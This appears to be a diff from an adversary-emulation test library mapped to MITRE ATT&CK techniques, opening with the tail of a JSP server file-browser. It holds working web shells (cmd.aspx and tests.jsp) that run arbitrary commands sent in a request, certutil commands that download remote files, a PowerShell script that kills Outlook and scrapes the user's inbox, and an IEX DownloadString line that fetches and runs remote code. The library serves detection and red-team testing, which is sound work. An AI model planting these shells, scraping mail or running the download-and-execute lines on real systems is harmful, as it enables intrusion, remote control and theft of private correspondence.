File new_f = new File(getDir(f.getParent(), request.getParameter("new_name")));
if (!isAllowed(new_f, true)){
request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath());
}
if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) {
File bak = new File(new_f.getAbsolutePath() + ".bak");
bak.delete();
new_f.renameTo(bak);
}
if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error",
"Cannot write to " + new_f.getName() + ", file is write protected.");
else {
BufferedWriter outs = new BufferedWriter(new FileWriter(new_f));
StringReader text = new StringReader(request.getParameter("text"));
int i;
boolean cr = false;
String lineend = "\n";
if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n";
while ((i = text.read()) >= 0) {
if (i == '\r') cr = true;
else if (i == '\n') {
outs.write(lineend);
cr = false;
}
else if (cr) {
outs.write(lineend);
cr = false;
}
else {
outs.write(i);
cr = false;
}
}
outs.flush();
outs.close();
}
}
request.setAttribute("dir", f.getParent());
}
//Unpack file to the current directory without overwriting
else if (request.getParameter("unpackfile") != null) {
File f = new File(request.getParameter("unpackfile"));
String root = f.getParent();
request.setAttribute("dir", root);
if (!isAllowed(new File(root), true)){
request.setAttribute("error", "You are not allowed to access " + root);
}
//Check if file exists
else if (!f.exists()) {
request.setAttribute("error", "Cannot unpack " + f.getName()
+ ", file does not exist");
}
//Check if directory is readonly
else if (!f.getParentFile().canWrite()) {
request.setAttribute("error", "Cannot unpack " + f.getName()
+ ", directory is write protected.");
}
//GZip
else if (f.getName().toLowerCase().endsWith(".gz")) {
//New name is old Name without .gz
String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3);
try {
byte buffer[] = new byte[0xffff];
copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream(
newName), buffer);
}
catch (IOException ex) {
request.setAttribute("error", "Unpacking of " + f.getName()
+ " aborted. Error: " + ex);
}
}
//Else try Zip
else {
try {
ZipFile zf = new ZipFile(f);
Enumeration entries = zf.entries();
//First check whether a file already exist
boolean error = false;
while (entries.hasMoreElements()) {
ZipEntry entry = (ZipEntry) entries.nextElement();
if (!entry.isDirectory()
&& new File(root + File.separator + entry.getName()).exists()) {
request.setAttribute("error", "Cannot unpack " + f.getName()
+ ", File " + entry.getName() + " already exists.");
error = true;
break;
}
}
if (!error) {
//Unpack File
entries = zf.entries();
byte buffer[] = new byte[0xffff];
while (entries.hasMoreElements()) {
ZipEntry entry = (ZipEntry) entries.nextElement();
File n = new File(root + File.separator + entry.getName());
if (entry.isDirectory()) n.mkdirs();
else {
n.getParentFile().mkdirs();
n.createNewFile();
copyStreams(zf.getInputStream(entry), new FileOutputStream(n),
buffer);
}
}
zf.close();
request.setAttribute("message", "Unpack of " + f.getName()
+ " was successful.");
}
}
catch (ZipException ex) {
request.setAttribute("error", "Cannot unpack " + f.getName()
+ ", no valid zip file");
}
catch (IOException ex) {
request.setAttribute("error", "Unpacking of " + f.getName()
+ " aborted. Error: " + ex);
}
}
}
// Delete Files
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(DELETE_FILES))) {
Vector v = expandFileList(request.getParameterValues("selfile"), true);
boolean error = false;
//delete backwards
for (int i = v.size() - 1; i >= 0; i--) {
File f = (File) v.get(i);
if (!isAllowed(f, true)){
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
error = true;
break;
}
if (!f.canWrite() || !f.delete()) {
request.setAttribute("error", "Cannot delete " + f.getAbsolutePath()
+ ". Deletion aborted");
error = true;
break;
}
}
if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted");
else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted");
else if (!error) request.setAttribute("error", "No files selected");
}
// Create Directory
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(CREATE_DIR))) {
String dir = "" + request.getAttribute("dir");
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
if (!isAllowed(new File(new_dir), true)){
request.setAttribute("error", "You are not allowed to access " + new_dir);
}
else if (new File(new_dir).mkdirs()) {
request.setAttribute("message", "Directory created");
}
else request.setAttribute("error", "Creation of directory " + new_dir + " failed");
}
// Create a new empty file
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(CREATE_FILE))) {
String dir = "" + request.getAttribute("dir");
String file_name = request.getParameter("cr_dir");
String new_file = getDir(dir, file_name);
if (!isAllowed(new File(new_file), true)){
request.setAttribute("error", "You are not allowed to access " + new_file);
}
// Test, if file_name is empty
else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) {
if (new File(new_file).createNewFile()) request.setAttribute("message",
"File created");
else request.setAttribute("error", "Creation of file " + new_file + " failed");
}
else request.setAttribute("error", "Error: " + file_name + " is not a valid filename");
}
// Rename a file
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(RENAME_FILE))) {
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = "" + request.getAttribute("dir");
String new_file_name = request.getParameter("cr_dir");
String new_file = getDir(dir, new_file_name);
if (!isAllowed(new File(new_file), true)){
request.setAttribute("error", "You are not allowed to access " + new_file);
}
// The error conditions:
// 1) Zero Files selected
else if (v.size() <= 0) request.setAttribute("error",
"Select exactly one file or folder. Rename failed");
// 2a) Multiple files selected and the first isn't a dir
// Here we assume that expandFileList builds v from top-bottom, starting with the dirs
else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute(
"error", "Select exactly one file or folder. Rename failed");
// 2b) If there are multiple files from the same directory, rename fails
else if ((v.size() > 1) && ((File) v.get(0)).isDirectory()
&& !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) {
request.setAttribute("error", "Select exactly one file or folder. Rename failed");
}
else {
File f = (File) v.get(0);
if (!isAllowed(f, true)){
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
}
// Test, if file_name is empty
else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) {
if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) {
request.setAttribute("error", "Creation of file " + new_file + " failed");
}
else request.setAttribute("message", "Renamed file "
+ ((File) v.get(0)).getName() + " to " + new_file);
}
else request.setAttribute("error", "Error: \"" + new_file_name
+ "\" is not a valid filename");
}
}
// Move selected file(s)
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(MOVE_FILES))) {
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = "" + request.getAttribute("dir");
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
if (!isAllowed(new File(new_dir), false)){
request.setAttribute("error", "You are not allowed to access " + new_dir);
}
else{
boolean error = false;
// This ensures that new_dir is a directory
if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
for (int i = v.size() - 1; i >= 0; i--) {
File f = (File) v.get(i);
if (!isAllowed(f, true)){
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
error = true;
break;
}
else if (!f.canWrite() || !f.renameTo(new File(new_dir
+ f.getAbsolutePath().substring(dir.length())))) {
request.setAttribute("error", "Cannot move " + f.getAbsolutePath()
+ ". Move aborted");
error = true;
break;
}
}
if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved");
else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved");
else if (!error) request.setAttribute("error", "No files selected");
}
}
// Copy Files
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(COPY_FILES))) {
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = (String) request.getAttribute("dir");
if (!dir.endsWith(File.separator)) dir += File.separator;
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
if (!isAllowed(new File(new_dir), true)){
request.setAttribute("error", "You are not allowed to access " + new_dir);
}
else{
boolean error = false;
if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
try {
byte buffer[] = new byte[0xffff];
for (int i = 0; i < v.size(); i++) {
File f_old = (File) v.get(i);
File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length()));
if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){
request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath());
error = true;
}
else if (f_old.isDirectory()) f_new.mkdirs();
// Overwriting is forbidden
else if (!f_new.exists()) {
copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer);
}
else {
// File exists
request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath()
+ ", file already exists. Copying aborted");
error = true;
break;
}
}
}
catch (IOException e) {
request.setAttribute("error", "Error " + e + ". Copying aborted");
error = true;
}
if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied");
else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied");
else if (!error) request.setAttribute("error", "No files selected");
}
}
// Directory viewer
if (dir_view && request.getAttribute("dir") != null) {
File f = new File("" + request.getAttribute("dir"));
//Check, whether the dir exists
if (!f.exists() || !isAllowed(f, false)) {
if (!f.exists()){
request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist.");
}
else{
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
}
//if attribute olddir exists, it will change to olddir
if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) {
f = new File("" + request.getAttribute("olddir"));
}
//try to go to the parent dir
else {
if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent());
}
//If this dir also do also not exist, go back to browser.jsp root path
if (!f.exists()) {
String path = null;
if (application.getRealPath(request.getRequestURI()) != null) path = new File(
application.getRealPath(request.getRequestURI())).getParent();
if (path == null) // handle the case were we are not in a directory (ex: war file)
path = new File(".").getAbsolutePath();
f = new File(path);
}
if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath());
else request.setAttribute("dir", null);
}
%>
<script type="text/javascript" src="<%=browser_name %>?Javascript">
</script>
<link type="text/css" rel="stylesheet" href="../css/styles_ceso.css"/>
<link type="text/css" rel="stylesheet" href="../css/ticker/simpleTicker.css" />
<link type="text/css" rel="stylesheet" href="../css/dropdown/dropdown.css" media="screen" />
<link type="text/css" rel="stylesheet" href="../css/dropdown/default.advanced.css" media="screen" />
<link type="text/css" rel="stylesheet" href="../css/form.css" media="screen"/>
<link type="text/css" rel="stylesheet" href="../css/jquery.jnotify-alt.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/jqModal.css" />
<link type="text/css" rel="stylesheet" href="../css/common.css" />
<link type="text/css" rel="stylesheet" href="../css/redmond/jquery-ui-1.8.14.custom.css" />
<link type="text/css" rel="stylesheet" href="../css/ui.multiselect.css" />
<title><%=request.getAttribute("dir")%></title>
</head>
<body>
<div id="container">
<div id="header">
<div id="bkorotator">
<img alt="" src="../images/rotator/1.jpg" />
</div>
</div>
<div id="menu">
<%@include file="../menu.jsp" %>
</div>
<div id="content">
<%
//Output message
if (request.getAttribute("message") != null) {
out.println("<table border=\"0\" width=\"100%\"><tr><td class=\"message\">");
out.println(request.getAttribute("message"));
out.println("</td></tr></table>");
}
//Output error
if (request.getAttribute("error") != null) {
out.println("<table border=\"0\" width=\"100%\"><tr><td class=\"error\">");
out.println(request.getAttribute("error"));
out.println("</td></tr></table>");
}
if (request.getAttribute("dir") != null){
%>
<form class="formular" action="<%= browser_name %>" method="Post" name="FileList">
Filename filter: <input name="filt" onKeypress="event.cancelBubble=true;" onkeyup="filter(this)" type="text">
<br /><br />
<table id="filetable" class="filelist" cellspacing="1px" cellpadding="0px">
<%
// Output the table, starting with the headers.
String dir = URLEncoder.encode("" + request.getAttribute("dir"));
String cmd = browser_name + "?dir=" + dir;
int sortMode = 1;
if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request
.getParameter("sort"));
int[] sort = new int[] {1, 2, 3, 4};
for (int i = 0; i < sort.length; i++)
if (sort[i] == sortMode) sort[i] = -sort[i];
out.print("<tr><th>&nbsp;</th><th title=\"Sort files by name\" align=left><a href=\""
+ cmd + "&amp;sort=" + sort[0] + "\">Name</a></th>"
+ "<th title=\"Sort files by size\" align=\"right\"><a href=\"" + cmd
+ "&amp;sort=" + sort[1] + "\">Size</a></th>"
+ "<th title=\"Sort files by type\" align=\"center\"><a href=\"" + cmd
+ "&amp;sort=" + sort[3] + "\">Type</a></th>"
+ "<th title=\"Sort files by date\" align=\"left\"><a href=\"" + cmd
+ "&amp;sort=" + sort[2] + "\">Date</a></th>"
+ "<th>&nbsp;</th>");
if (!READ_ONLY) out.print ("<th>&nbsp;</th>");
out.println("</tr>");
char trenner = File.separatorChar;
// Output the Root-Dirs, without FORBIDDEN_DRIVES
File[] entry = File.listRoots();
for (int i = 0; i < entry.length; i++) {
boolean forbidden = false;
for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) {
if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true;
}
if (!forbidden) {
out.println("<tr class=\"mouseout\" onmouseover=\"this.className='mousein'\""
+ "onmouseout=\"this.className='mouseout'\">");
out.println("<td>&nbsp;</td><td align=left >");
String name = URLEncoder.encode(entry[i].getAbsolutePath());
String buf = entry[i].getAbsolutePath();
out.println(" &nbsp;<a href=\"" + browser_name + "?sort=" + sortMode
+ "&amp;dir=" + name + "\">[" + buf + "]</a>");
out.print("</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td></td></tr>");
}
}
// Output the parent directory link ".."
if (f.getParent() != null) {
out.println("<tr class=\"mouseout\" onmouseover=\"this.className='mousein'\""
+ "onmouseout=\"this.className='mouseout'\">");
out.println("<td></td><td align=left>");
out.println(" &nbsp;<a href=\"" + browser_name + "?sort=" + sortMode + "&amp;dir="
+ URLEncoder.encode(f.getParent()) + "\">" + FOL_IMG + "[..]</a>");
out.print("</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td></td></tr>");
}
// Output all files and dirs and calculate the number of files and total size
entry = f.listFiles();
if (entry == null) entry = new File[] {};
long totalSize = 0; // The total size of the files in the current directory
long fileCount = 0; // The count of files in the current working directory
if (entry != null && entry.length > 0) {
Arrays.sort(entry, new FileComp(sortMode));
for (int i = 0; i < entry.length; i++) {
String name = URLEncoder.encode(entry[i].getAbsolutePath());
String type = "File"; // This String will tell the extension of the file
if (entry[i].isDirectory()) type = "DIR"; // It's a DIR
else {
String tempName = entry[i].getName().replace(' ', '_');
if (tempName.lastIndexOf('.') != -1) type = tempName.substring(
tempName.lastIndexOf('.')).toLowerCase();
}
String ahref = "<a onmousedown=\"dis()\" href=\"" + browser_name + "?sort="
+ sortMode + "&amp;";
String dlink = "&nbsp;"; // The "Download" link
String elink = "&nbsp;"; // The "Edit" link
String buf = conv2Html(entry[i].getName());
if (!entry[i].canWrite()) buf = "<i>" + buf + "</i>";
String link = buf; // The standard view link, uses Mime-type
if (entry[i].isDirectory()) {
if (entry[i].canRead() && USE_DIR_PREVIEW) {
//Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip
File[] fs = entry[i].listFiles();
if (fs == null) fs = new File[] {};
Arrays.sort(fs, new FileComp());
StringBuffer filenames = new StringBuffer();
for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) {
String fname = conv2Html(fs[i2].getName());
if (fs[i2].isDirectory()) filenames.append("[" + fname + "];");
else filenames.append(fname + ";");
}
if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("...");
else if (filenames.length() > 0) filenames
.setLength(filenames.length() - 1);
link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">"
+ FOL_IMG + "[" + buf + "]</a>";
}
else if (entry[i].canRead()) {
link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]</a>";
}
else link = FOL_IMG + "[" + buf + "]";
}
else if (entry[i].isFile()) { //Entry is file
totalSize = totalSize + entry[i].length();
fileCount = fileCount + 1;
if (entry[i].canRead()) {
dlink = ahref + "downfile=" + name + "\">Download</a>";
//If you click at the filename
if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">"
+ buf + "</a>";
else link = ahref + "file=" + name + "\">" + buf + "</a>";
if (entry[i].canWrite()) { // The file can be edited
//If it is a zip or jar File you can unpack it
if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+ "\">Unpack</a>";
else elink = ahref + "editfile=" + name + "\">Edit</a>";
}
else { // If the file cannot be edited
//If it is a zip or jar File you can unpack it
if (isPacked(name, true)) elink = ahref + "unpackfile=" + name
+ "\">Unpack</a>";
else elink = ahref + "editfile=" + name + "\">View</a>";
}
}
else {
link = buf;
}
}
String date = dateFormat.format(new Date(entry[i].lastModified()));
out.println("<tr class=\"mouseout\" onmouseup=\"selrow(this, 2)\" "
+ "onmouseover=\"selrow(this, 0);\" onmouseout=\"selrow(this, 1)\">");
if (entry[i].canRead()) {
out.println("<td align=center><input type=\"checkbox\" name=\"selfile\" value=\""
+ name + "\" onmousedown=\"dis()\"></td>");
}
else {
out.println("<td align=center><input type=\"checkbox\" name=\"selfile\" disabled></td>");
}
out.print("<td align=left> &nbsp;" + link + "</td>");
if (entry[i].isDirectory()) out.print("<td>&nbsp;</td>");
else {
out.print("<td align=right title=\"" + entry[i].length() + " bytes\">"
+ convertFileSize(entry[i].length()) + "</td>");
}
out.println("<td align=\"center\">" + type + "</td><td align=left> &nbsp;" + // The file type (extension)
date + "</td><td>" + // The date the file was created
dlink + "</td>"); // The download link
if (!READ_ONLY)
out.print ("<td>" + elink + "</td>"); // The edit link (or view, depending)
out.println("</tr>");
}
}%>
</table>
<input type="checkbox" name="selall" onClick="AllFiles(this.form)">Select all
<p align=center>
<b title="<%=totalSize%> bytes">
<%=convertFileSize(totalSize)%></b><b> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%>
</b>
</p>
<input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<input type="hidden" name="sort" value="<%=sortMode%>">
<input title="Download selected files and directories as one zip file" class="button" id="but_Zip" type="Submit" name="Submit" value="<%=SAVE_AS_ZIP%>">
<% if (!READ_ONLY) {%>
<input title="Delete all selected files and directories incl. subdirs" class="button" id="but_Del" type="Submit" name="Submit" value="<%=DELETE_FILES%>"
onclick="return confirm('Do you really want to delete the entries?')">
<% } %>
<% if (!READ_ONLY) {%>
<br />
<input title="Enter new dir or filename or the relative or absolute path" class="textfield" type="text" onKeypress="event.cancelBubble=true;" id="text_Dir" name="cr_dir">
<input title="Create a new directory with the given name" class="button" id="but_NDi" type="Submit" name="Submit" value="<%=CREATE_DIR%>">
<input title="Create a new empty file with the given name" class="button" id="but_NFi" type="Submit" name="Submit" value="<%=CREATE_FILE%>">
<input title="Move selected files and directories to the entered path" id="but_Mov" class="button" type="Submit" name="Submit" value="<%=MOVE_FILES%>">
<input title="Copy selected files and directories to the entered path" id="but_Cop" class="button" type="Submit" name="Submit" value="<%=COPY_FILES%>">
<input title="Rename selected file or directory to the entered name" id="but_Ren" class="button" type="Submit" name="Submit" value="<%=RENAME_FILE%>">
<% } %>
</form>
<br />
<div class="formular">
<% if (ALLOW_UPLOAD) { %>
<form class="formular2" action="<%= browser_name%>" enctype="multipart/form-data" method="POST">
<input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<input type="hidden" name="sort" value="<%=sortMode%>">
<input type="file" class="textfield" onKeypress="event.cancelBubble=true;" name="myFile">
<input title="Upload selected file to the current working directory" type="Submit" class="button" name="Submit" value="<%=UPLOAD_FILES%>"
onClick="javascript:popUp('<%= browser_name%>')">
</form>
<%} %>
<% if (NATIVE_COMMANDS) {%>
<form class="formular2" action="<%= browser_name%>" method="POST">
<input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>">
<input type="hidden" name="sort" value="<%=sortMode%>">
<input type="hidden" name="command" value="">
<input title="Launch command in current directory" type="Submit" class="button" id="but_Lau" name="Submit" value="<%=LAUNCH_COMMAND%>">
</form><%
}%>
</div>
<%}%>
<hr>
<center>
<small>jsp File Browser version <%= VERSION_NR%> by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
</center>
<%@include file="../footer.jsp" %>
</body>
</html><%
}
%>
atomics/T1100/shells/cmd.aspx
+37
View File
@@ -0,0 +1,37 @@
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
myProcessStartInfo.UseShellExecute = false
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments=xcmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,"<","&lt;")
mystring=replace(mystring,">","&gt;")
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>
atomics/T1100/shells/tests.jsp
+26
View File
@@ -0,0 +1,26 @@
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
atomics/T1105/T1105.md
+46
View File
@@ -18,6 +18,10 @@ Adversaries may also copy files laterally between internal victim systems to sup
- [Atomic Test #6 - sftp remote file copy (pull)](#atomic-test-6---sftp-remote-file-copy-pull)
- [Atomic Test #7 - certutil download (urlcache)](#atomic-test-7---certutil-download-urlcache)
- [Atomic Test #8 - certutil download (verifyctl)](#atomic-test-8---certutil-download-verifyctl)
<br/>
@@ -145,3 +149,45 @@ Utilize sftp to perform a remote file copy (pull)
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
<br/>
<br/>
## Atomic Test #7 - certutil download (urlcache)
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
```
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```
<br/>
<br/>
## Atomic Test #8 - certutil download (verifyctl)
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `powershell`!
```
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
```
<br/>
atomics/T1105/T1105.yaml
+40
View File
@@ -170,3 +170,43 @@ atomic_tests:
name: bash
command: |
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
- name: certutil download (urlcache)
description: |
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: command_prompt
command: |
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
- name: certutil download (verifyctl)
description: |
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
supported_platforms:
- windows
input_arguments:
remote_file:
description: URL of file to copy
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path to place file
type: Path
default: Atomic-license.txt
executor:
name: powershell
command: |
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
atomics/T1114/Get-Inbox.ps1
+61
View File
@@ -0,0 +1,61 @@
<#
.SYNOPSIS
Scrapes message data from the inbox of the current user and stores data in 'mail.csv' in the directory where the scrip was executed
Outlook Email Collection
MITRE ATT&CK - T1114
Author: Greg Foss (@heinzarelli)
Date: February, 2019
License: BSD 3-Clause
.EXAMPLE
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
Write emails out to a CSV
PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
#>
[CmdLetBinding()]
param( [string]$file )
function Kill-Outlook {
# Check to see if outlook is running, and close it to scrape mail data programmatically
$outlook = Get-Process -Name Outlook -ErrorAction SilentlyContinue
if ($outlook) {
$outlook.CloseMainWindow()
Sleep 5
if (!$outlook.HasExited) {
$outlook | Stop-Process -Force > $null
}
}
Remove-Variable outlook > $null
}
function Scrape-Outlook {
# Connect to the local outlook inbox and read mail
Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null
$olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type]
$inbox = new-object -comobject outlook.application
$namespace = $inbox.GetNameSpace("MAPI")
$folder = $namespace.getDefaultFolder($olFolders::olFolderInBox)
Write-Output "Please be patient, this may take some time..."
# Output the data
if ( $file ) {
$folder.items |
Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName, Body |
Export-Csv -Path $file
} else {
$folder.items |
Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName
}
}
Kill-Outlook > $null
Scrape-Outlook
Kill-Outlook > $null
atomics/T1114/T1114.md
+35
View File
@@ -0,0 +1,35 @@
# T1114 - Email Collection
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1114)
<blockquote>Adversaries may target user email to collect sensitive information from a target.
Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</blockquote>
## Atomic Tests
- [Atomic Test #1 - T1114 Email Collection with PowerShell](#atomic-test-1---t1114-email-collection-with-powershell)
<br/>
## Atomic Test #1 - T1114 Email Collection with PowerShell
Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
Write emails out to a CSV
PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
Download and Execute
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')"
```
<br/>
atomics/T1114/T1114.yaml
+25
View File
@@ -0,0 +1,25 @@
---
attack_technique: T1114
display_name: Email Collection
attack_link: https://attack.mitre.org/wiki/Technique/T1114
atomic_tests:
- name: T1114 Email Collection with PowerShell
description: |
Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
supported_platforms:
- windows
executor:
name: command_prompt
command: |
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
Write emails out to a CSV
PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
Download and Execute
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')"
atomics/T1140/T1140.md
+1 -1
View File
@@ -50,6 +50,6 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
#### Run it with `command_prompt`!
```
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable}
cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
```
<br/>
atomics/T1140/T1140.yaml
+1 -1
View File
@@ -39,4 +39,4 @@ atomic_tests:
name: command_prompt
command: |
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable}
cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
atomics/T1197/T1197.md
+3 -2
View File
@@ -60,7 +60,7 @@ Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{lo
<br/>
## Atomic Test #3 - Persist, Download, & Execute
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
**Supported Platforms:** Windows
@@ -73,13 +73,14 @@ and execute a payload in multiple steps. This job will remain in the BITS queue
